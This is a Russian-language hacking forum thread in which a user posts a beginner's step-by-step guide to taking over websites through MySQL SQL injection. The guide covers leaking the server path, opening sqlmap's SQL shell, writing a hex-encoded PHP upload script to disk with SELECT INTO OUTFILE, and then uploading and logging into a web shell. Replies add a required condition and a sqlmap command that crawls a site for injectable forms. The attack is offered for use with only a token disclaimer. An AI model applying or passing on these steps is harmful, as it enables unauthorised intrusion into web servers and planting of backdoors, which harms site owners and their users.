ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

18.05.2015, 12:14
|
|
Новичок
Регистрация: 18.05.2015
Сообщений: 26
Провел на форуме: 9828
Репутация:
3
|
|
Доброго времени суток, друзья.
Я давно натыкался на статейку, сейчас уже не могу её найти. Но думаю вам будет интересно почитать.
Сразу говорю, статья не для пропентестеров, а для тех кто только начинает свой путь в этой сфере. Не судите строго...
Для начала нам понадобится:
1) PHPSHell
2) SQLmap
3) Скрипт на пхыеСкрипт аплоада на Пых'е
=============================
Первым делом, после того как мы нашли уязвимость, нам надо получить FPD. Варинтов множество, но мне обычно подходит Array[] Parameter инъекция.
И получаем ожидаемое.
Сообщение от None
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/relax/public_html/index.php on line 59
Далее нам нужно перевезти код "нашего" скрипта для аплоада в hex. На выхлопе мы получаем незатейливый кодец и стремительно запускаем скульмап. Для получения максимальной информации я стараюсь убить двух зайцев сразу, чего и вам советую. Помимо того, что мы хотим попасть в шелл SQL было бы славно познакомиться с базой.
Перед нашими глазами воспрянет:
Сообщение от None
[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>
Наша команда должна иметь вид:
Код:
SELECT 0xНаш_хекс_код INTO OUTFILE "Полный/путь/и_имя/файла.php";
Допустим мы назвали его upload.php, значит дико-бешено бежим на http://www.example.com/upload.php. Заливаем шелл и занимаемся его поиском. После чего можно логиниться на него и продолжать идти к намеченной цели.
===========
Работает это только на MySQL и только с file-priv "Y"
Статья написана в ознакомительных целях, только для расширения кругозора новичков. Автор не несёт ответственности на её использование.
|
|
|

18.05.2015, 12:22
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
забыли еще одно обязательное условие
|
|
|

18.05.2015, 12:23
|
|
Познавший АНТИЧАТ
Регистрация: 24.04.2009
Сообщений: 1,730
Провел на форуме: 30140275
Репутация:
3256
|
|
|
|
|

18.05.2015, 12:25
|
|
Новичок
Регистрация: 18.05.2015
Сообщений: 26
Провел на форуме: 9828
Репутация:
3
|
|
Так-то это я. Могу копипастить своё сколько угодно. Или же нет?
|
|
|

18.05.2015, 12:29
|
|
Познавший АНТИЧАТ
Регистрация: 24.04.2009
Сообщений: 1,730
Провел на форуме: 30140275
Репутация:
3256
|
|
Сообщение от Bezlishke
↑
Так-то это я.
Могу копипастить своё сколько угодно. Или же нет?
Ну раз "я"..
Всё дело в знаниях, актуальности и востребованности.. мб и "могу", но с февраля уж столько прошло и потом вот это
Сообщение от Bezlishke
↑
Работает это только на MySQL и только с file-priv "Y"
такое призрачное, но флаг в руки если кто-то воспользуется, но для начала откопает..
|
|
|

18.05.2015, 12:31
|
|
Новичок
Регистрация: 18.05.2015
Сообщений: 26
Провел на форуме: 9828
Репутация:
3
|
|
Сообщение от Suicide
↑
Всё дело в знаниях, актуальности и востребованности.. мб и "могу", но с февраля уж столько прошло и потом вот это
Сообщение от Bezlishke
↑
Статья написана в ознакомительных целях, только для расширения кругозора новичков.
Сообщение от Suicide
↑
такое призрачное, но флаг в руки если кто-то воспользуется, но для начала откопает..
Я до сих пор нахожу иногда
|
|
|

18.05.2015, 12:41
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме: 238786
Репутация:
40
|
|
ну вообще кошмар. давно ещё на эксплоите видел, ужас, кошмар. Ужас. нет слов.
|
|
|

18.05.2015, 14:10
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
так вот еще одно обязательное условие: реальные кавычки в пути до файла. /threads/34338/
|
|
|

18.05.2015, 16:08
|
|
Новичок
Регистрация: 18.05.2015
Сообщений: 26
Провел на форуме: 9828
Репутация:
3
|
|
Сообщение от faza02
↑
так вот еще одно обязательное условие: реальные кавычки в пути до файла.
/threads/34338/
Спасибо. Буду дома дополню
|
|
|

18.05.2015, 16:33
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме: 238786
Репутация:
40
|
|
Наверное словосочетание sqlmap сканер, уже потеряло актуальность.
Однако sql не только инструмент для "раскрутки" уязвимости. Но он ещё реально сканер, да-да, сканер, и как вы догадались он находит sql уязвимые параметры в GET and POST запросах
Вот маленький пример
sqlmap --random-agent -u site.org --form --crawl=2 --batch
Где : --form "обработка" post данных альтернатива (--data )
--crawl=2
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|